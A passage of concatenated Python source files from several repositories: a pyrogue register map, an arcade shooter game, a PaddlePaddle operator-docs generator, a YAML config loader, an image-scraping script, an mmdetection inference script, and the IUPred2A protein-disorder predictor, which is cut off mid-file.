0x00000008, bitSize = 1, bitOffset = 0, base = pr.UInt, mode = "RW", )) self.add(pr.RemoteVariable( name = "StreamCounterRst", description = "Reset stream counters", offset = 0x00000008, bitSize = 1, bitOffset = 8, base = pr.UInt, mode = "RW", )) self.add(pr.RemoteVariable( name = "EofeCounterRst", description = "Reset stream EOFE", offset = 0x00000008, bitSize = 1, bitOffset = 9, base = pr.UInt, mode = "RW", )) self.add(pr.RemoteVariable( name = "StreamCounter", description = "Count number of stream triggers", offset = 0x0000000C, bitSize = 32, bitOffset = 0, base = pr.UInt, mode = "RO", pollInterval = 1, )) self.add(pr.RemoteVariable( name = "EofeCounter", description = "Stream EOFE counter", offset = 0x00000010, bitSize = 32, bitOffset = 0, base = pr.UInt, mode = "RO", pollInterval = 1, )) class AppCore(pr.Device): def __init__( self, name = "AppCore", description = "MicrowaveMux Application", numRxLanes = [0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices ######### # for i in range(2): # if ((numRxLanes[i] > 0) or (numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( # name = "MicrowaveMuxCore[%i]" % (i), # offset = (i*0x00100000), # expand = True, # )) # # self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ########### # Registers ########### self.add(pr.RemoteVariable( name = "DacSigTrigDelay", description = "DacSig TrigDelay", offset = 0x03000000, bitSize = 24, bitOffset = 0, base = pr.UInt, mode = "RW", units = "1/(307MHz)", )) self.add(pr.RemoteVariable( name = "DacSigTrigArm", description = "DacSig TrigArm", offset = 0x03000004, bitSize = 1, bitOffset = 0, base = pr.UInt, mode = "WO", hidden = True, )) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000, expand=False, )) ############################## # Commands ############################## @self.command(description="Arms for a DAC SIG Trigger to the DAQ MUX",) def CmdDacSigTrigArm(): self.DacSigTrigArm.set(1)
1.460938
1
shooting_game/assets/Shooter-Game.py
rodsam9/cse210-project
0
12796634
<filename>shooting_game/assets/Shooter-Game.py<gh_stars>0 import random import arcade import math import os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600 SCREEN_TITLE = "Shooter Game" SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health): super().__init__(image, scale) # Add extra attributes for health self.player_max_health = player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw how many health the enemies have health_string = f"{self.player_cur_health}/{self.player_max_health}" start_x = 25 start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health bar # Draw the red background start_x = 120 start_y = 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width based on health start_x = 85 start_y = 25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): """ Move the player """ # Move player around the screen self.center_x += self.change_x self.center_y += self.change_y # Check for out-of-bounds if self.left < 0: self.left = 0 elif self.right > SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH - 1 # Make sure he cant go off the screen if self.bottom < 0: self.bottom = 0 elif self.top > SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self): # Rotate the coin. # The arcade.Sprite class has an "angle" attribute that controls # the sprite rotation. Change this, and the sprite rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite): # This tells the enemies to go to the main guy if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale) # Add extra attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw how many health the enemies have health_string = f"{self.enemy_cur_health}/{self.enemy_max_health}" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health bar # Draw the red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): """ Class that manages the 'menu' view. """ def on_show(self): """ Called when switching to this view""" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): """ Draw the menu """ arcade.start_render() start_x = 220 start_y = 370 arcade.draw_text("Shooter Game", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y = 270 arcade.draw_text("Use the arrow keys on your keyboard to move around", start_x, start_y, arcade.color.RED, 15) start_x = 310 start_y = 240 arcade.draw_text("Use your mouse to aim", start_x, start_y, arcade.color.RED, 15) start_x = 360 start_y = 210 arcade.draw_text("Click to Shoot", start_x, start_y, arcade.color.RED, 15) start_x = 330 start_y = 110 arcade.draw_text("Click to start", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers): """ Use a mouse press to advance to the 'game' view. """ game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): """ Class to manage the game over view """ def on_show(self): """ Called when switching to this view""" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): """ Draw the game over view """ arcade.start_render() arcade.draw_text("Game Over!\n", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x="center") start_x = 290 start_y = 270 arcade.draw_text(f"You died in level: {self.window.level}", start_x, start_y, arcade.color.RED, 20) arcade.draw_text("Click ESCAPE to return to Main Menu.\n", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x="center") def on_key_press(self, key, _modifiers): """ If user hits escape, go back to the main menu view """ if key == arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): """ Main application class. """ def __init__(self): """ Initializer """ # Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will hold sprite lists self.player_list = None self.enemy_list = None self.bullet_list = None # Set up the player self.player_sprite = None self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3 = 10 self.good = True self.window.level = 1 self.updated_level = -1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound("shooting_game/assets/sounds/newLevel.wav") self.gun_sound = arcade.load_sound("shooting_game/assets/sounds/shoot.wav") self.hit_sound = arcade.load_sound("shooting_game/assets/sounds/shoot.wav") self.death_sound = arcade.load_sound("shooting_game/assets/sounds/deathenemy.wav") self.playerDeath_sound = arcade.load_sound("shooting_game/assets/sounds/death.wav") self.gameOver_sound = arcade.load_sound("shooting_game/assets/sounds/gameOver.wav") self.left_pressed = False self.right_pressed = False self.up_pressed = False self.down_pressed = False self.width = SCREEN_WIDTH # Background image will be stored in this variable self.background = None def levels(self): while self.good: if self.window.level >= 0 and self.window.level <= 3: for i in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(":resources:images/animated_characters/robot/robot_walk7.png", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level > 3 and self.window.level < 6: for i in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(":resources:images/animated_characters/robot/robot_walk7.png", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(":resources:images/animated_characters/robot/robot_fall.png", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level = self.updated_level + 1 else: self.good = False else: for i in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(":resources:images/animated_characters/robot/robot_walk7.png", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(":resources:images/animated_characters/robot/robot_fall.png", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(":resources:images/enemies/saw.png", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level = self.updated_level + 1 else: self.good = False def setup(self): # Set up the game # Sprite lists self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set the background color self.background = arcade.load_texture(":resources:images/backgrounds/abstract_1.jpg") def on_key_press(self, key, modifiers): """Called whenever a key is pressed. """ if key == arcade.key.UP: self.up_pressed = True elif key == arcade.key.DOWN: self.down_pressed = True elif key == arcade.key.LEFT: self.left_pressed = True elif key == arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key, modifiers): """Called when the user releases a key. """ if key == arcade.key.UP: self.up_pressed = False elif key == arcade.key.DOWN: self.down_pressed = False elif key == arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed = False def on_draw(self): # render the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f"Level: {self.window.level}" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers): # Called whenever the mouse button is clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet = arcade.Sprite(":resources:images/space_shooter/meteorGrey_small1.png", SPRITE_SCALING_BULLET) # Position the bullet at the player's current location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y # Get from the mouse the destination location for the bullet dest_x = x dest_y = y # Do math to calculate how to get the bullet to the destination. x_diff = dest_x - start_x y_diff = dest_y - start_y angle = math.atan2(y_diff, x_diff) # Taking into account the angle, calculate our change_x # and change_y. Velocity is how fast the bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED # Add the bullet to the lists self.bullet_list.append(bullet) def on_update(self, delta_time): """ Movement and game logic """ self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level > self.updated_level: self.window.level += 1 self.good = True self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in player_hit: # Make sure this is the right sprite if not isinstance(player, PLAYER): raise TypeError("List contents must be all ints") # Remove one health point player.player_cur_health -= 1 # Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet for bullet in self.bullet_list: # Check this bullet to see if it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get rid of the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every enemy we hit, process for enemy in hit_list: # Make sure this is the right sprite if not isinstance(enemy, ENEMY): raise TypeError("List contents must be all ints") # Remove one health point enemy.enemy_cur_health -= 1 # Check health if enemy.enemy_cur_health <= 0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) # If the bullet flies off-screen, remove it. if bullet.bottom > self.width or bullet.top < 0 or bullet.right < 0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, "Shooter Game") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level = 0 # game = MyGame() # game.setup() # arcade.run() if __name__ == "__main__": main()
3.078125
3
portal/portal/legacy/operators.py
sneaxiy/PaddlePaddle.org
47
12796635
<gh_stars>10-100 import json import os import re import codecs from bs4 import BeautifulSoup from django.template import Template, Context import markdown from deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS OPERATOR_TEMPLATE = '<div class="section" id="{{ type }}">' + ( '<h2>{{ type }}</h2>') + ( '<dl class="function"><dd>{{ comment|safe }}') + ( '<table class="docutils field-list">') + ( '<colgroup><col class="field-name"><col class="field-body"></colgroup>') + ( '<tbody valign="top">') + ( '<tr class="field-odd field">') + ( '<th class="field-name">Inputs:</th>') + ( '<td class="field-body"><ul class="first simple">{% for input in inputs %}<li><strong>{{ input.name }}</strong> {% if input.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if input.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ input.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') + ( '<tr class="field-even field"><th class="field-name">Outputs:</th>') + ( '<td class="field-body"><ul class="first simple">{% for output in outputs %}<li><strong>{{ output.name }}</strong> {% if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if output.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ output.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') + ( '{% if attrs|length_is:"0" %}{% else %}<tr class="field-odd field"><th class="field-name">Attributes:</th>') + ( '<td class="field-body"><ul class="first simple">{% for attr in attrs %}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>){% if attr.generated == 1 %} (<em>Generated</em>) {% endif %}: {{ attr.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>{% endif %}') + ( '</tbody>') + ( '</table></dd>') + ( '</dl>') + ( '</div>') OPERATORS_WRAPPER = ( '<div class="document">{% verbatim %}<h1>Operators</h1><div class="section" id="operators">', '</div>{% endverbatim %}</div>' ) OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name): try: operators_json_path = OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir) if not os.path.exists(operators_json_path): raise Exception('operators.json does not exists in %s' % operators_json_path) generate_operators_page_with_path(operators_json_path, generated_docs_dir) except Exception, e: print 'Failed to build operator docs because: ', e def generate_operators_page_with_path(operators_api_path, destination_dir): try: # Open the operators API file. with open(operators_api_path) as raw_operators_api_file: raw_operators_api = raw_operators_api_file.read() generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html']) except Exception, e: print 'Failed to build operator docs because: ', e def generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output = '' try: operators = clean_json_string(raw_operators_api) # Go through all the operators and construct a new HTML object. operator_template = Template(OPERATOR_TEMPLATE) operators_output += OPERATORS_WRAPPER[0] for operator in operators: if 'comment' in operator: formula_map = {} comment = reserve_formulas(operator['comment'], formula_map, only_reserve_double_dollar=True) comment = markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS) #if len(operator_comment_line) > 0: if 'markdown-equation' in comment: soup = BeautifulSoup('<p>' + comment + '</p>', 'lxml') markdown_equation_placeholders = soup.select('.markdown-equation') for equation in markdown_equation_placeholders: equation.string = formula_map[equation.get('id')] comment = unicode( str(soup.select('body')[0])[6:-7], 'utf-8' ) operator['comment'] = comment operators_output += operator_template.render(Context(operator)) operators_output += OPERATORS_WRAPPER[1] for lang in lang_dirs: operators_output_path = '%s/%s/operators.html' % (destination_dir, lang) print 'Saving operators.html to %s' % operators_output_path if not os.path.exists(os.path.dirname(operators_output_path)): os.makedirs(os.path.dirname(operators_output_path)) with codecs.open(operators_output_path, 'w', 'utf-8') as operators_output_file: operators_output_file.write(operators_output) except Exception, e: print 'Failed to build operator docs because: ', e def clean_json_string(body): """ Takes in a string meant to be interpreted as a JSON object, and removes faulty characters, recursively. """ try: return json.loads(body) except ValueError, e: if str(e).startswith('Invalid control character'): faulty_character_index = int(re.search( 'char (?P<column>\d+)', str(e)).group('column')) return clean_json_string( body[:faulty_character_index] + body[faulty_character_index+1:])
2.375
2
mysql2sqlite/config/__init__.py
MFrat/mysql2sqlite
0
12796636
import yaml from pkg_resources import resource_stream def load(filename): with resource_stream(__name__, filename) as config_file: return yaml.load(config_file) def load_cluster_config(name): return load('{0}.yml'.format(name)) _env = load('context.yml') _configs = {} def get_config(env): if env not in _configs: _configs[env] = load_cluster_config(get_cluster_name(env)) _configs[env].update(_env[env].get("override", {})) return _configs[env] def get_cluster_name(env): return _env[env]["cluster"]
2.328125
2
crawl.py
doudounannan/python-crawl
0
12796637
import requests, urllib, urllib2, os from bs4 import BeautifulSoup import style def getImg(url): response = requests.get(url) soup = BeautifulSoup(response.text, 'lxml') imgs = soup.find_all('img') for img in imgs: print(img.get('src')) def downloadImg(imgUrl, targetUrl): arr = imgUrl.split('/') fileName = arr[len(arr) - 1] if not os.path.exists(targetUrl + fileName): output = open(targetUrl + fileName, 'wb+') imgData = urllib2.urlopen(imgUrl).read() output.write(imgData) output.close() print style.use_style('[info] ', mode='bold', fore='green') + style.use_style(fileName, fore='cyan') + ' is downloaded.' else: print style.use_style('[warning] ', mode='bold', fore='red') + style.use_style(fileName, fore='purple') + ' is here!' downloadImg('http://posters.imdb.cn/ren-pp/0000701/CjR3AsiaP_1190290948.jpg', '/Users/zhengmeiyu/Downloads/') getImg('http://22mm.xiuna.com/mm/qingliang/')
3.21875
3
fsc/detect.py
wsx66848/tsd
4
12796638
<reponame>wsx66848/tsd import sys from myutils import my_config from mmdet.apis.inference import inference_detector, init_detector, show_result_pyplot,show_result import os.path as osp from app import * debug = False # only for debug def load_result(): lines = "" with open("test_image/standard_result_6411.txt", "r") as f: lines = f.read() return lines def main(): #detection debug if debug is True: print(load_result()) return path = sys.path[0] # config = path + '/../configs/faster_rcnn_r50_fpn_1x.py' # checkpoint = path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth' config = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py' checkpoint = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth' model = init_detector(config, checkpoint) my_config.set('classes', model.CLASSES) # print(model) img = path + '/test.jpg' if(len(sys.argv) > 1) : img = sys.argv[1] print(img) result = inference_detector(model, img) out_file = osp.splitext(img)[0] + "_result.png" # show_result_pyplot(img, result, model.CLASSES, score_thr=0.05) show_result(img, result, model.CLASSES, out_file=out_file) print("out_file:%s" % out_file) if __name__ == '__main__': main()
1.765625
2
bin/iupred2a.py
tomasMasson/baculovirus_phylogenomics
0
12796639
<gh_stars>0 #!/usr/bin/env python3 import sys import textwrap import math import os from Bio import SeqIO def avg(lst): return sum(lst) / len(lst) def aa_freq(_seq): _freq = {} for _aa in _seq: if _aa in _freq: _freq[_aa] += 1 else: _freq[_aa] = 1 for _aa, _ins in _freq.items(): _freq[_aa] = _ins / len(_seq) return _freq def read_matrix(matrix_file): _mtx = {} with open(matrix_file, "r") as _fhm: for _line in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def read_histo(histo_file): hist = [] h_min = float("inf") h_max = -float("inf") with open(histo_file, "r") as fnh: for _line in fnh: if _line.startswith("#"): continue if float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if float(_line.split()[1]) > h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max - h_min) / (len(hist)) return hist, h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score = [0] * len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window + 1)]) return weighted_energy_score def read_seq(fasta_file): _seq = "" with open(fasta_file) as file_handler: for _line in file_handler: if _line.startswith(">"): continue _seq += _line.strip() return _seq def iupred(seq, mode): if mode == "short": lc = 1 uc = 25 wc = 10 mtx = read_matrix("{}/data/iupred2_short_energy_matrix".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo("{}/data/short_histogram".format(PATH)) elif mode == 'glob': lc = 1 uc = 100 wc = 15 mtx = read_matrix("{}/data/iupred2_long_energy_matrix".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo("{}/data/long_histogram".format(PATH)) else: lc = 1 uc = 100 wc = 10 mtx = read_matrix("{}/data/iupred2_long_energy_matrix".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo("{}/data/long_histogram".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score = [0] * len(seq) iupred_score = [0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] + seq[idx + lc + 1:idx + uc + 1]) for aa, freq in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx] += 0 if mode == 'short': for idx in range(len(seq)): for idx2 in range(idx - wc, idx + wc + 1): if idx2 < 0 or idx2 >= len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx - wc, idx + wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = "" if mode == 'glob': gr = [] in_gr = False beg, end = 0, 0 for idx, val in enumerate(weighted_energy_score): if in_gr and val <= 0.3: gr.append({0: beg, 1: end}) in_gr = False elif in_gr: end += 1 if val > 0.3 and not in_gr: beg = idx end = idx in_gr = True if in_gr: gr.append({0: beg, 1: end}) mgr = [] k = 0 kk = k + 1 if gr: beg = gr[0][0] end = gr[0][1] nr = len(gr) while k < nr: if kk < nr and gr[kk][0] - end < 45: beg = gr[k][0] end = gr[kk][1] kk += 1 elif end - beg + 1 < 35: k += 1 if k < nr: beg = gr[k][0] end = gr[k][1] else: mgr.append({0: beg, 1: end}) k = kk kk += 1 if k < nr: beg = gr[k][0] end = gr[k][1] seq = seq.lower() nr = 0 res = "" for i in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr = i[1] + 1 res += seq[nr:] res = " ".join([res[i:i + 10] for i in range(0, len(res), 10)]) glob_text += "Number of globular domains: {}\n".format(len(mgr)) for n, i in enumerate(mgr): glob_text += " globular domain {}.\t{}-{}\n".format(n + 1, i[0] + 1, i[1] + 1) glob_text += "\n".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score): if val <= histo_min + 2 * histo_step: iupred_score[idx] = 1 elif val >= histo_max - 2 * histo_step: iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size = 30 local_smoothing_window = 5 par_a = 0.0013 par_b = 0.26 par_c = 0.43 iupred_limit = par_c - (par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score = [0] * len(seq) energy_gain = [0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)] + seq[idx + 2:idx + local_window_size + 1]) for aa, freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx] += 0 for aa, freq in interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score = [0] * len(seq) for idx in range(len(seq)): sign = 1 if energy_gain[idx] < par_b and iupred_scores[idx] < par_c: sign = -1 corr = 0 if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0: corr = (par_a / (iupred_scores[idx] - par_c)) + par_b anchor_score[idx] = sign * (energy_gain[idx] + corr - par_b) * (iupred_scores[idx] - par_c) anchor_score[idx] = 1 / (1 + math.e ** (-22.97968 * (anchor_score[idx] - 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = """Usage: {} (options) (seqfile) (iupred type) \tAvailable types: \"long\", \"short\", \"glob\" Options \t-d str - Location of data directory (default='./') \t-a - Enable ANCHOR2 predition\n""".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found at {}!\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory not found at {}!\n{}'.format(PATH, help_msg)) if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at {}!\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short', 'long', 'glob']: sys.exit('Wrong iupred2 option {}!\n{}'.format(sys.argv[-1], help_msg)) # Print output message with run parameters print("""# IUPred2A: context-dependent prediction of protein disorder as a function of redox state and protein binding # <NAME>, <NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction type: {} # Prediction output""".format(sys.argv[-1])) # Add SeqIO parser to support multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], "fasta") for sequence in sequences: # Print individual sequence identifier for posterior parsing print(f">{sequence.id}") iupred2_result = iupred(sequence, sys.argv[-1]) if '-a' in sys.argv: if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in 